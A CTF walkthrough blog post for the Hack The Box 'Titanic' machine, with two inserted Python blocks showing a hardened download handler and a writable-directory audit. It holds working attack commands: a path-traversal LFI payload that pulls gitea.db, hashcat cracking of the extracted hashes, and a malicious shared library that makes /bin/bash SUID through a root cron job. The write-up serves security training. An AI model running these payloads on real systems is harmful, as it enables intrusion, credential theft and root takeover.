Titanic | Hack The Box – Walkthrough | RGHX

Hey Hackers! 👾

A fresh machine just dropped on HackTheBox (launched 16 Feb 2025), and it’s begging to be hacked! 🔥

⚡ Level: Easy
⚡ Link: https://app.hackthebox.com/machines/Titanic

Let’s get to the fun stuff:

🔍 Port Scanning
🗂️ Directory Enumeration
🔧 Manual Exploration
🐚 Shell as developer
🚀 Privilege Escalation

Ready? Let’s go hack this thing! 💻⚡️

Port Scanning

rustscan -a 10.10.11.55 -r 1-65535 -- -A -oN ports.txt 
  • Only ports 80 and 22 are open.
  • Let’s access the website. First, add the machine’s IP to your hosts file:
echo '10.10.11.55 titanic.htb' | sudo tee -a /etc/hosts
  • Now, let’s explore the site to see what it
  • At the same time, start your directory enumeration.

Directory Enumeration

gobuster dir -u titanic.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 -x html,txt,php -o gobuster.txt
  • Apart from these two directories, I didn’t find anything interesting in the directory enumeration.
  • So, let’s check out the website and explore its content.

Initial Access

  • There’s only a “Book Now” option available, so let’s quickly check it out.
  • To understand its basic functionality, I entered some random data and submitted the form.
  • Upon submission, the data was converted into a JSON file and downloaded locally, serving as a ticket to board the Titanic ship.
  • In this type of functionality, where a file is being downloaded, LFI is a great attack vector to test.
  • Now, let’s fire up Burp Suite and intercept the request.
  • Send the request and capture the response to observe what happens.
  • It reveals the path from which our file is being downloaded. Just click on the “Follow Redirection” button to capture the download request.
  • After this, try accessing the “passwd” file. It was easy to get into this machine using this payload.
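The bug behind this step is a download handler that joins the user-supplied ticket name onto a directory without checking where the result ends up. The following is an added example (not code from the box or from the original post) showing that pattern next to a hardened version; the ticket directory path is an assumption.

```python
import os
from typing import Optional

# Assumed location of the generated ticket files; the box's real path is not stated on the page.
TICKET_DIR = "/opt/app/tickets"


def vulnerable_ticket_path(ticket: str, ticket_dir: str = TICKET_DIR) -> str:
    """The bug class on the page: the ticket name is joined to the directory as-is.
    '../../../etc/passwd' walks out of the directory, and an absolute name such as
    '/etc/passwd' makes os.path.join discard the directory entirely."""
    return os.path.join(ticket_dir, ticket)


def safe_ticket_path(ticket: str, ticket_dir: str = TICKET_DIR) -> Optional[str]:
    """Hardened lookup: only a bare *.json filename that resolves inside the
    ticket directory is accepted; anything else yields None (i.e. HTTP 400/404)."""
    # A legitimate ticket is a plain filename: no separators, no '.', no '..'
    if ticket in ("", ".", "..") or os.path.basename(ticket) != ticket:
        return None
    if not ticket.endswith(".json"):
        return None
    base = os.path.realpath(ticket_dir)
    full = os.path.realpath(os.path.join(base, ticket))
    # Even after the name checks, require the resolved path to sit under base
    # (guards against symlinks planted inside the ticket directory).
    if os.path.commonpath([base, full]) != base:
        return None
    return full
```
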

Local File Inclusion

  • I tried accessing a lot of things here, but unfortunately, I kept coming up empty-handed every time — whether it was the id_rsa, authorized keys, or log files. Nothing interesting was found.
  • So, I’ve decided to start host fuzzing since I couldn’t find anything here.

Subdomain Enumeration

gobuster vhost -u titanic.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -t 100 2>/dev/null --follow-redirect
  • Add “dev.titanic.htb” to your /etc/hosts file, just like we did at the beginning.
  • Let’s head over to “dev.titanic.htb”.
  • Since I’ve dealt with this Gitea in another CTF, I directly clicked on the “Explore” button.
  • I checked both directories and found the credentials and the path.
  • By default, Gitea stores its credentials in a gitea.db file, so let’s try to access this .db file through the LFI vulnerability we discovered.

Hash Extraction from DB file

  • Let’s use curl to retrieve the gitea.db file and store it locally.
curl http://titanic.htb/download?ticket=../../../home/developer/gitea/data/gitea/gitea.db -o gitea.db
  • Now, we need to extract the hashes from this file. I tried doing it manually, but it didn’t work out, so let’s use a tool available on GitHub for this purpose.

GitHub – YukaFake/extract_hash_to_pbkdf2: a small script to extract the hash once you have the Gitea db file (github.com)

  • Download this file and run it with this command.
./extract_hash_format.sh gitea.db > hashes.txt
  • We won’t be cracking them by hand. Instead, we’ll use Hashcat. But before that, let’s strip the username subsection from the file so that Hashcat can parse it cleanly and avoid any errors.
  • I removed the username subsection and the administrator hash because it won’t crack — I already tried cracking that one.

Hash Cracking

hashcat -m 10900 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt --force
  • It successfully cracked the password for the user “developer”.
  • Let’s SSH into the machine and gain our initial access.

Shell as “developer” user

  • Here’s our shell, and we’ve successfully submitted the “user.txt” file.

Privilege Escalation

  • You might get stuck here like I did, as I checked almost everything, including the sudoers file, SUIDs, cronjobs, any malicious files, and
  • At this point, it’s better to run LinPEAS, and if you take a close look at the output, you’ll notice a binary: “/usr/bin/magick”.
magick --version
  • Do a quick Google search, and you’ll come across this GitHub resource.
  • Just scroll down, and you’ll find this.
  • Now we have everything we need. We just need a file that runs “magick” with root privileges. Once we have that, we can place our shared library in the respective directory, and whenever that file is executed, our shared library will run.
  • In LinPEAS, you’ll notice a few “interesting paths”, such as:
  • /opt/scripts
  • /opt/app/static/assets/images/

In “/opt/scripts/”, you’ll find this file.

  • This file essentially performs three tasks:
  1. It changes the directory to /opt/app/static/assets/images/.
  2. It truncates (empties) the metadata.log file in that directory.
  3. It then finds all the .jpg files in that directory, uses the “magick” tool to extract the metadata from those images, and stores the log into metadata.log.
  • Now, we just need to place our shared library payload in
  • Before that, edit the payload to give you a shell. You can try whatever works best for you.
  • For me, I made /bin/bash a SUID and then executed it.
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
system("chmod u+s /bin/bash");
exit(0);
}
EOF
  • I pasted this in “/opt/app/static/assets/images/” and pressed enter.
  • Now, we just need one thing: a way to run this file as root, which will make /bin/bash a SUID, allowing us to execute it and gain a root shell.
  • Thanks to my friend “Yannis”, who noticed that a hidden cron job is running this binary every 20 seconds and then deleting the file after execution.
  • So, I simply waited for 20 seconds, and then I executed the bash command.
/bin/bash -p 
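The root cause of this escalation is a privileged job that changes into a directory a low-privileged user can write to and then runs a binary that picks up shared libraries from that directory. As an added audit example (my own code, not from the box or the original post), the check below reports a job working directory that is writable by someone other than the job's owner and any shared object already sitting in it; the constructed directory builder is only there so the check can be run offline.

```python
import os
import stat
import tempfile
from typing import List


def is_shared_object(name: str) -> bool:
    """Matches libfoo.so, libfoo.so.1, libxcb.so.1 ... but not images or logs."""
    return name.endswith(".so") or ".so." in name


def audit_job_workdir(workdir: str, job_uid: int = 0) -> List[str]:
    """Findings for a directory a privileged job (e.g. a root cron job that
    cd's into an images folder and runs `magick`) operates in."""
    findings = []
    st = os.stat(workdir)
    if st.st_uid != job_uid:
        findings.append(f"{workdir}: owned by uid {st.st_uid}, not the job's uid {job_uid}")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{workdir}: world-writable")
    elif st.st_mode & stat.S_IWGRP:
        findings.append(f"{workdir}: group-writable (gid {st.st_gid})")
    for name in sorted(os.listdir(workdir)):
        if is_shared_object(name):
            findings.append(f"{os.path.join(workdir, name)}: shared object in a data directory")
    return findings


def build_constructed_example() -> str:
    """Constructed sample: a world-writable 'images' directory containing one
    real-looking image and a planted libxcb.so.1 (empty file, not a library)."""
    root = tempfile.mkdtemp(prefix="audit_demo_")
    images = os.path.join(root, "images")
    os.mkdir(images)
    for name in ("ship.jpg", "metadata.log", "libxcb.so.1"):
        open(os.path.join(images, name), "w").close()
    os.chmod(images, 0o777)
    return images


if __name__ == "__main__":
    for line in audit_job_workdir(build_constructed_example()):
        print(line)
```
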

Thank you! I hope you enjoyed this walkthrough.

Buy me a coffee : https://buymeacoffee.com/rghacker

Youtube : https://www.youtube.com/@theunixverse77

By Raman Gautam

Caffeine-fueled cybersecurity explorer, CTF addict, and tech storyteller. When I’m not digging through logs or chasing flags, you’ll find me building vulnerable labs, breaking into containers, or sharing my journey through blogs, walkthroughs, and late-night code experiments.